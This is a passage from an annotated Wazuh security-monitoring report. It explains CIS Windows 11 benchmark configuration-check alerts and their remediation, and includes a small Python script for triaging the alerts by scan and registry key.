data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
Registry key the check reads; the Group Policy setting in the remediation writes here. After the GPO applies, confirm on the host (reg query or Get-ItemProperty on this key) and re‑run the scan.

data.sca.check.result:  failed
passed, failed or not applicable. failed = needs fixing; not applicable means the check could not be evaluated (see data.sca.check.reason when present) and must not be read as a pass.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
Open a hardening ticket for agent 001 (Attacker, 192.168.6.131): set the Group Policy path quoted in data.sca.check.remediation to Enabled, making sure the DataCollection.admx/adml template it names (21H2 administrative templates or newer) is available to the policy editor, then re‑run the SCA scan and confirm check 26298 reports passed. Until OneSettings auditing is on, treat the absence of OneSettings events from this host as a visibility gap, not as evidence of no activity.

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.784+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.784+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. For SCA the stock rules encode the outcome: 19007 = check failed, 19008 = check passed, 19009 = not applicable. It should agree with data.sca.check.result below.

rule.firedtimes:  21
How many times this exact rule hit since the manager started counting. For SCA this is just the number of checks with the same outcome in the scan (here, 21 failed checks so far), not repeated behaviour by the host.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.6']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2549073
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26299
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether additional diagnostic logs are collected when more information is needed to troubleshoot a problem on the device. The recommended state for this setting is: Enabled. Note: Diagnostic logs are only sent when the device has been configured to send optional diagnostic data. Diagnostic data is limited with recommendation Allow Diagnostic Data is set to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data to send only basic information.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending data to a 3rd-party vendor is a security concern and should only be done on an as-needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Limit Diagnostic Log Collection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.6
CIS benchmark recommendation number as written in the SCA policy file; rule.cis above is copied from here, so the two should agree.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
Registry key the check reads, the same key as check 26298 in this scan; the Group Policy setting in the remediation writes here. After the GPO applies, confirm on the host (reg query or Get-ItemProperty on this key) and re‑run the scan.

data.sca.check.result:  failed
passed, failed or not applicable. failed = needs fixing; not applicable means the check could not be evaluated (see data.sca.check.reason when present) and must not be read as a pass.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
Same host, same scan and same DataCollection registry key as check 26298: fold this into that ticket and enable Limit Diagnostic Log Collection in the same GPO change. Per the description the setting only matters when optional diagnostic data is being sent, so review the Allow Diagnostic Data setting it references at the same time rather than closing this finding in isolation. Re‑scan and confirm check 26299 passes.

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.816+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. For SCA the stock rules encode the outcome: 19007 = check failed, 19008 = check passed, 19009 = not applicable. It should agree with data.sca.check.result below.

rule.firedtimes:  22
How many times this exact rule hit since the manager started counting. For SCA this is just the number of checks with the same outcome in the scan (here, 22 failed checks so far), not repeated behaviour by the host.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.8']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['2.5']
CIS Critical Security Controls safeguard the benchmark maps this check to (2.5 = Allowlist Authorized Software).

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2552677
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26301
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether users can access the Insider build controls in the Advanced Options for Windows Update. These controls are located under "Get Insider builds," and enable users to make their devices available for downloading and installing Windows preview software. The recommended state for this setting is: Disabled. Note: This policy setting applies only to devices running Windows 10 Pro or Windows 10 Enterprise, up until Release 1703. For Release 1709 or newer, Microsoft encourages using the Manage preview builds setting (recommendation title ‘Manage preview builds’). We have kept this setting in the benchmark to ensure that any older builds of Windows 10 in the environment are still enforced.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  It can be risky for experimental features to be allowed in an enterprise managed environment because this can introduce bugs and security holes into systems, making it easier for an attacker to gain access. It is generally preferred to only use production-ready builds.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Toggle user control over Insider builds. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AllowBuildPreview.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.8
CIS benchmark recommendation number as written in the SCA policy file; rule.cis above is copied from here, so the two should agree.

data.sca.check.compliance.cis_csc:  2.5
CIS Critical Security Controls safeguard from the policy file (2.5 = Allowlist Authorized Software); feeds rule.cis_csc above.

data.sca.check.compliance.pci_dss:  4.1
PCI DSS requirement tag from the policy file; merged into rule.pci_dss above.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
HIPAA Security Rule technical safeguard paragraphs (45 CFR 164.312) the policy file ties to this check; feeds rule.hipaa above.

data.sca.check.compliance.nist_800_53:  SC.8
NIST SP 800‑53 control tag from the policy file (Wazuh writes a dot where the catalogue uses a dash); merged into rule.nist_800_53 above.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
SOC 2 Trust Services Criteria tags from the policy file; merged into rule.tsc above, which is why CC7.2 appears twice there.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PreviewBuilds']
Registry key the check reads; the Group Policy setting in the remediation writes here. After the GPO applies, confirm on the host (reg query or Get-ItemProperty on this key) and re‑run the scan.

data.sca.check.result:  failed
passed, failed or not applicable. failed = needs fixing; not applicable means the check could not be evaluated (see data.sca.check.reason when present) and must not be read as a pass.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
Set Toggle user control over Insider builds to Disabled via the remediation path (AllowBuildPreview.admx/adml, PreviewBuilds key). The description is explicit that this setting governs builds up to 1703 and that Manage preview builds is the control for newer releases, so on a Windows 11 host confirm that setting as well; passing this check alone does not prove preview builds are blocked. Re‑scan and confirm check 26301 passes.

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.833+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.833+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19009
Numeric ID of the detection rule that fired. For SCA the stock rules encode the outcome: 19007 = check failed, 19008 = check passed, 19009 = not applicable. It should agree with data.sca.check.result below.

rule.firedtimes:  1
How many times this exact rule hit since the manager started counting. For SCA this is just the number of checks with the same outcome in the scan (here, the first not‑applicable check), not repeated behaviour by the host.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '6.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SI.2', 'SA.11', 'SI.4']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'A1.2', 'CC6.8']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.18.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['7.3']
CIS Critical Security Controls safeguard the benchmark maps this check to (7.3 = Perform Automated Operating System Patch Management).

rule.gpg_13:  ['4.3']
UK Good Practice Guide 13 (Protective Monitoring) control. Wazuh emits this key as gpg_13 on some rules and gpg13 on others, so a dashboard filter has to match both spellings.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV mapping, Article 35(7)(d); the same reference rule.gdpr above carries as IV_35.7.d.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2557475
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26302
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the download method that Delivery Optimization can use in downloads of Windows Updates, Apps and App updates. The following methods are supported: - 0 = HTTP only, no peering. - 1 = HTTP blended with peering behind the same NAT. - 2 = HTTP blended with peering across a private group. Peering occurs on devices in the same Active Directory Site (if exist) or the same domain by default. When this option is selected, peering will cross NATs. To create a custom group use Group ID in combination with Mode 2. - 3 = HTTP blended with Internet Peering. - 99 = Simple download mode with no peering. Delivery Optimization downloads using HTTP only and does not attempt to contact the Delivery Optimization cloud services. - 100 = Bypass mode. Do not use Delivery Optimization and use BITS instead. The recommended state for this setting is any value EXCEPT: Enabled: Internet (3). Note: The default on all SKUs other than Enterprise, Enterprise LTSB or Education is Enabled: Internet (3), so on other SKUs, be sure to set this to a different value.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Due to privacy concerns and security risks, updates should only be downloaded directly from Microsoft, or from a trusted machine on the internal network that received its updates from a trusted source and approved by the network administrator.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to any value other than Enabled: Internet (3): Computer Configuration\Policies\Administrative Templates\Windows Components\Delivery Optimization\Download Mode. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DeliveryOptimization.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.18.1
CIS benchmark recommendation number as written in the SCA policy file; rule.cis above is copied from here, so the two should agree.

data.sca.check.compliance.cis_csc:  7.3
CIS Critical Security Controls safeguard from the policy file (7.3 = Perform Automated Operating System Patch Management); feeds rule.cis_csc above.

data.sca.check.compliance.pci_dss:  6.2
PCI DSS requirement tag from the policy file; merged into rule.pci_dss above.

data.sca.check.compliance.nist_800_53:  SI.2,SA.11,SI.4
NIST SP 800‑53 control tags from the policy file (Wazuh writes a dot where the catalogue uses a dash); merged into rule.nist_800_53 above.

data.sca.check.compliance.gpg_13:  4.3
UK Good Practice Guide 13 (Protective Monitoring) control; feeds rule.gpg_13 above.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV, Article 35(7)(d); feeds rule.gdpr_IV above.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule technical safeguard paragraph (45 CFR 164.312(b), audit controls); feeds rule.hipaa above.

data.sca.check.compliance.tsc:  A1.2,CC6.8
SOC 2 Trust Services Criteria tags from the policy file; merged into rule.tsc above.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeliveryOptimization']
Registry key the check tried to read; the Group Policy setting in the remediation writes here. After the GPO applies, confirm on the host (reg query or Get-ItemProperty on this key) and re‑run the scan.

data.sca.check.result:  not applicable
passed, failed or not applicable. This one is not applicable, which here means the check could not be evaluated (see data.sca.check.reason below); it must not be read as a pass.

data.sca.check.reason:  Unable to read registry 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization' (The system cannot find the file specified. )
Why the check could not be evaluated. The policy key does not exist, so Download Mode is not set by policy at all and the OS default applies; per the description that default is Enabled: Internet (3) on every SKU except Enterprise, Enterprise LTSB and Education. Unverified, not compliant.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions
Do not close this as a pass. The check could not read HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization because the key does not exist, which means Download Mode is not set by policy and the SKU default applies; the description notes that every SKU other than Enterprise, Enterprise LTSB and Education defaults to Enabled: Internet (3). Confirm the SKU of agent 001, read the effective Download Mode on the host, and either set the policy to any value other than 3 or record why the default is acceptable. After the next scan the check should report passed or failed, not not applicable.
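The four SCA alerts above arrive as one burst from a single scan_id, and the useful triage questions are the same every time: which checks failed, which are unverified because the check could not read its input, and which findings share a registry key so that one GPO change closes several of them. The following Python is an added example, not SOCscribe or Wazuh code. It runs on constructed alert documents that copy the fields shown in this report (plus one constructed passed check so every bucket is exercised), cross-checks the stock rule id (19007 failed, 19008 passed, 19009 not applicable) against data.sca.check.result, flags a not-applicable result caused by an unreadable policy key, and groups failed checks by the registry key they read. The helper sca_alert and the sample data are assumptions made for the example; the field layout is the alert JSON as rendered above.

```python
"""Triage of Wazuh SCA check alerts. Added example; not SOCscribe or Wazuh code."""
from collections import defaultdict

# Stock Wazuh SCA rules as they appear in this report: which outcome each fires on.
SCA_RULE_RESULT = {19007: "failed", 19008: "passed", 19009: "not applicable"}

HKLM_POLICIES = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows"


def sca_alert(rule_id, check_id, title, result, cis, key, reason=None):
    """Build a minimal alert document with the field layout shown in this report."""
    check = {"id": check_id, "title": title, "result": result,
             "compliance": {"cis": cis}, "registry": [key]}
    if reason:
        check["reason"] = reason
    return {"rule": {"id": rule_id}, "agent": {"id": "001", "name": "Attacker"},
            "data": {"sca": {"type": "check", "scan_id": 1948494698, "check": check}}}


# Constructed alerts copying the four checks above, plus one passed check so
# every bucket is exercised. Not live manager output.
SAMPLE_ALERTS = [
    sca_alert(19007, 26298, "Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.",
              "failed", "18.9.17.5", HKLM_POLICIES + r"\DataCollection"),
    sca_alert(19007, 26299, "Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.",
              "failed", "18.9.17.6", HKLM_POLICIES + r"\DataCollection"),
    sca_alert(19007, 26301, "Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.",
              "failed", "18.9.17.8", HKLM_POLICIES + r"\PreviewBuilds"),
    sca_alert(19009, 26302, "Ensure 'Download Mode' is NOT set to 'Enabled: Internet'.",
              "not applicable", "18.9.18.1", HKLM_POLICIES + r"\DeliveryOptimization",
              reason="Unable to read registry '" + HKLM_POLICIES + r"\DeliveryOptimization"
                     + "' (The system cannot find the file specified. )"),
    sca_alert(19008, 26305, "Ensure 'Security: Control Event Log behavior when the log "
              "file reaches its maximum size' is set to 'Disabled'.",
              "passed", "18.9.27.2.1", HKLM_POLICIES + r"\EventLog\Security"),
]


def classify(alert):
    """Return (result, note). The note flags a rule id that disagrees with the
    check result, or a not-applicable result caused by an unreadable key."""
    check = alert["data"]["sca"]["check"]
    rule_id = int(alert["rule"]["id"])
    result = check.get("result", "unknown")
    expected = SCA_RULE_RESULT.get(rule_id)
    if expected is not None and expected != result:
        return result, f"rule.id {rule_id} implies '{expected}' but check says '{result}'"
    if result == "not applicable" and "Unable to read registry" in check.get("reason", ""):
        return result, "policy key absent: OS default applies, verify the effective value on the host"
    return result, ""


def triage(alerts):
    """Group by scan_id, then bucket by result: {scan_id: {result: [(cis, check id, title, note)]}}."""
    by_scan = defaultdict(lambda: defaultdict(list))
    for alert in alerts:
        sca = alert["data"]["sca"]
        check = sca["check"]
        result, note = classify(alert)
        by_scan[sca["scan_id"]][result].append(
            (check.get("compliance", {}).get("cis", "-"), check["id"], check["title"], note))
    return by_scan


def tickets_by_registry_key(alerts):
    """Failed checks grouped by the registry key they read, so checks fixed by
    the same GPO change (here both DataCollection findings) share one ticket."""
    per_key = defaultdict(list)
    for alert in alerts:
        if classify(alert)[0] != "failed":
            continue
        check = alert["data"]["sca"]["check"]
        for key in check.get("registry", []):
            per_key[key].append(check.get("compliance", {}).get("cis", "-"))
    return dict(per_key)


if __name__ == "__main__":
    for scan_id, buckets in triage(SAMPLE_ALERTS).items():
        print(f"scan {scan_id}: " + ", ".join(f"{r}={len(v)}" for r, v in buckets.items()))
        for cis, check_id, title, note in buckets["failed"]:
            print(f"  FAIL CIS {cis} (check {check_id}): {title}")
        for cis, check_id, title, note in buckets["not applicable"]:
            print(f"  N/A  CIS {cis} (check {check_id}): {note}")
    for key, cis_ids in tickets_by_registry_key(SAMPLE_ALERTS).items():
        print(f"ticket {key}: CIS {', '.join(cis_ids)}")
```

On a real manager the input would be the alerts.json documents for one scan_id; the rule-id cross-check is cheap insurance against a custom rule that overrides 19007 or 19009, and the ticket grouping is what stops the two DataCollection findings above from becoming two tickets for one GPO edit.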

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.880+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.880+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired. For SCA the stock rules encode the outcome: 19007 = check failed, 19008 = check passed, 19009 = not applicable. It should agree with data.sca.check.result below.

rule.firedtimes:  3
How many times this exact rule hit since the manager started counting. For SCA this is just the number of checks with the same outcome in the scan (here, 3 passed checks so far), not repeated behaviour by the host.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.2.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
CIS Critical Security Controls safeguard the benchmark maps this check to (8.3 = Ensure Adequate Audit Log Storage).

rule.gpg13:  ['4.12']
UK Good Practice Guide 13 (Protective Monitoring) control. Wazuh emits this key as gpg13 on some rules and gpg_13 on others, so a dashboard filter has to match both spellings.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV mapping, Article 35(7)(d); the same reference rule.gdpr above carries as IV_35.7.d.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2563077
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26305
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.2.1
CIS benchmark recommendation number as written in the SCA policy file; rule.cis above is copied from here, so the two should agree.

data.sca.check.compliance.cis_csc:  8.3
CIS Critical Security Controls safeguard from the policy file (8.3 = Ensure Adequate Audit Log Storage); feeds rule.cis_csc above.

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement tag from the policy file; merged into rule.pci_dss above.

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control tag from the policy file (Wazuh writes a dot where the catalogue uses a dash); merged into rule.nist_800_53 above.

data.sca.check.compliance.gpg13:  4.12
UK Good Practice Guide 13 (Protective Monitoring) control; feeds rule.gpg13 above.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV, Article 35(7)(d); feeds rule.gdpr_IV above.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule technical safeguard paragraph (45 CFR 164.312(b), audit controls); feeds rule.hipaa above.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria tags from the policy file; merged into rule.tsc above, which is why CC7.2 appears twice there.

